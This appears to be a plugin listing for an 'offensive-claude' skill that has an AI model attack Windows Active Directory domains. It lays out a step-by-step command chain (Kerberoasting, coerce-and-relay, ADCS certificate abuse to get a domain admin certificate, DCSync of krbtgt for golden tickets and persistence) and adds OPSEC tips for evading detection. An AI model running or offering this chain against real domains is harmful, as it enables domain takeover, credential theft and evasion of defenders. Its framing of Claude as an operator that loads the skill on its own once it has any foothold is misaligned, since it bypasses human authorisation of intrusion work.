From offensive-claude
Attacks Windows Active Directory domains via Kerberos roasting/delegation, coercion + relay, ADCS abuse (ESC1-16), ticket forgery, DCSync, dMSA exploitation, and BloodHound attack-path enumeration.
How this skill is triggered — by the user, by Claude, or both
Slash command
/offensive-claude:active-directory-attackThe summary Claude sees in its skill listing — used to decide when to auto-load this skill
- Attacking Windows domain environments after gaining any domain foothold (creds, hash, or unauth network position)
references/adcs-abuse.mdreferences/bloodhound-enum-lateral.mdreferences/coercion-relay.mdreferences/dmsa-badsuccessor.mdreferences/kerberos-roasting-delegation.mdreferences/ticket-forgery-dcsync.mdscripts/Get-BadSuccessorOUPermissions.ps1scripts/ad_recon.pyscripts/adcs_esc_finder.pyscripts/coerce_relay_chain.shscripts/kerberoast_audit.pyscripts/rbcd_takeover.py| Technique | ATT&CK | CWE | Reference | Script |
|---|---|---|---|---|
| BloodHound CE / SharpHound enumeration | T1482 | CWE-732 | references/bloodhound-enum-lateral.md | scripts/ad_recon.py |
| Password spray / PtH / PtT lateral movement | T1550.002, T1550.003 | CWE-522 | references/bloodhound-enum-lateral.md | scripts/ad_recon.py |
| LAPS / gMSA password read | T1003 | CWE-522 | references/bloodhound-enum-lateral.md | scripts/ad_recon.py |
| Kerberoasting | T1558.003 | CWE-261 | references/kerberos-roasting-delegation.md | scripts/kerberoast_audit.py |
| AS-REP roasting | T1558.004 | CWE-308 | references/kerberos-roasting-delegation.md | scripts/kerberoast_audit.py |
| Resource-Based Constrained Delegation (RBCD) | T1558, T1098 | CWE-269 | references/kerberos-roasting-delegation.md | scripts/rbcd_takeover.py |
| Constrained/Unconstrained delegation (S4U) | T1558 | CWE-269 | references/kerberos-roasting-delegation.md | scripts/rbcd_takeover.py |
| Coercion (PetitPotam/DFSCoerce/PrinterBug/WebDAV) | T1187 | CWE-294 | references/coercion-relay.md | scripts/coerce_relay_chain.sh |
| NTLM relay (SMB/LDAP/ADCS) | T1557.001 | CWE-294 | references/coercion-relay.md | scripts/coerce_relay_chain.sh |
| NTLM reflection (CVE-2025-33073) | T1187, T1557.001 | CWE-294 | references/coercion-relay.md | scripts/coerce_relay_chain.sh |
| Kerberos relay / DNS CNAME (CVE-2026-20929) | T1557 | CWE-294 | references/coercion-relay.md | scripts/coerce_relay_chain.sh |
| ADCS ESC1 (SAN) / ESC15 EKUwu (CVE-2024-49019) | T1649 | CWE-295 | references/adcs-abuse.md | scripts/adcs_esc_finder.py |
| ADCS ESC8 relay / ESC16 CA-wide override | T1649, T1557.001 | CWE-295 | references/adcs-abuse.md | scripts/adcs_esc_finder.py |
| Golden / Silver / Diamond / Sapphire ticket | T1558.001, T1558.002 | CWE-345 | references/ticket-forgery-dcsync.md | - |
| DCSync (DRSUAPI replication) | T1003.006 | CWE-269 | references/ticket-forgery-dcsync.md | - |
| noPac / sAMAccountName spoofing (CVE-2021-42278/87) | T1558 | CWE-287 | references/ticket-forgery-dcsync.md | - |
| dMSA BadSuccessor (CVE-2025-53779) | T1098, T1558 | CWE-269 | references/dmsa-badsuccessor.md | scripts/Get-BadSuccessorOUPermissions.ps1 |
# 0. Sync clock to DC (Kerberos needs +/-5 min)
sudo ntpdate <DC_IP> # or: faketime "$(net time -S <DC>)" <cmd>
# 1. Enumerate: BloodHound CE collection (Linux) + own the graph
bloodhound-python -u user -p 'Pass' -d corp.local -dc dc01.corp.local -ns <DC_IP> -c all --zip
# (use the bloodhound-ce branch; legacy collectors break CE ingest)
nxc ldap <DC_IP> -u user -p 'Pass' --bloodhound --collection All --dns-server <DC_IP>
# 2. Cheap wins on the graph: roast everything visible
python3 scripts/kerberoast_audit.py -d corp.local --dc-ip <DC_IP> -u user -p 'Pass' --asrep --kerberoast
# 3. Coerce + relay to LDAP/ADCS (RBCD or cert) if signing/EPA weak
bash scripts/coerce_relay_chain.sh corp.local user 'Pass' <DC_IP> <RELAY_IP> ldap
# 4. ADCS path: find ESC1-16 and grab a DA cert
python3 scripts/adcs_esc_finder.py -d corp.local -u user -p 'Pass' --dc-ip <DC_IP>
certipy req -u [email protected] -p 'Pass' -ca CA -template Vuln -upn [email protected]
certipy auth -pfx administrator.pfx -dc-ip <DC_IP> # -> NT hash / TGT
# 5. Windows Server 2025 present? Check BadSuccessor exposure
powershell -ep bypass -File scripts/Get-BadSuccessorOUPermissions.ps1
# 6. Domain dominance: DCSync krbtgt -> Golden ticket / persistence
impacket-secretsdump -just-dc-user 'corp\krbtgt' corp.local/da:'Pass'@<DC_IP>
| Technique | Telemetry / IOC | Detection (Sigma / EDR) | OPSEC note |
|---|---|---|---|
| SharpHound/LDAP enum | Hundreds of LDAP queries from one host; 4662 directory access | SIEM rule: single source > N LDAP queries/minute; ADWS 9389 spikes | Throttle --throttle/--jitter; prefer ADWS (SOAPHound) to dodge LDAP heuristics |
| Kerberoasting | 4769 TGS-REQ with RC4 (0x17) for many SPNs from one host | Sigma win_security_susp_kerberos_manipulation; alert on RC4 TGS bursts | Request AES-only SPNs sparingly; /rc4opsec; roast few accounts, slow |
| AS-REP roasting | 4768 AS-REQ no-preauth; etype 23 | Alert on AS-REQ for DONT_REQ_PREAUTH accounts | Only target accounts BloodHound flags; offline crack |
| Coercion | EFSRPC/DFSNM/RPRN named-pipe calls; auth from server to odd host | Sigma coercion/PetitPotam; RPC firewall (RpcFilter) logs | Coercion is "by design"; NTLM removal on 2025/24H2 forces Kerberos fallback |
| NTLM relay / reflection | 4624/4648 NTLM logon to self; SMB→LDAP from non-server | Detect SMB-signing:False targets; CVE-2025-33073 DNS marshalled record | Needs signing:False target; patch (Jun 2025) detects marshalled DNS struct |
| ADCS ESC | 4886/4887 cert issuance; cert with arbitrary SAN/UPN; client-auth EKU on web template | Sigma ADCS issuance anomalies; certutil monitoring; ESC15 EKU injection | Restore templates (ESC4); EPA on certsrv breaks ESC8 relay |
| Ticket forgery | TGT lifetime anomalies; PAC w/o validation; 4769 for krbtgt SPN | Golden: ticket lifetime > policy; Sapphire mimics real PAC (hard) | Match domain ticket policy lifetimes; use AES keys not RC4 |
| DCSync | 4662 DRSUAPI GetNCChanges from non-DC | Sigma dcsync; alert DRSUAPI replication from non-DC IP | Run from a host that looks like a DC; avoid /all, target krbtgt only |
| dMSA BadSuccessor | 5137 dMSA create; 5136 write to msDS-ManagedAccountPrecededByLink | Sigma SharpSuccessor exec; SACL on dMSA attrs (off by default!) | Patched (Aug 2025) needs both sides controlled; still a creds-dump primitive |
npx claudepluginhub hypnguyen1209/offensive-claude --plugin offensive-claudeEnumerates Active Directory objects, discovers attack paths with BloodHound, exploits Kerberos weaknesses, and escalates privileges via ADCS/DCSync to demonstrate domain compromise.
Conducts an Active Directory penetration test: enumerate domain objects, discover attack paths with BloodHound, exploit Kerberos, escalate via ADCS/DCSync.
Guides red team attacks on Microsoft Active Directory with reconnaissance, credential harvesting, Kerberos attacks, lateral movement, privilege escalation using BloodHound, Impacket, Mimikatz.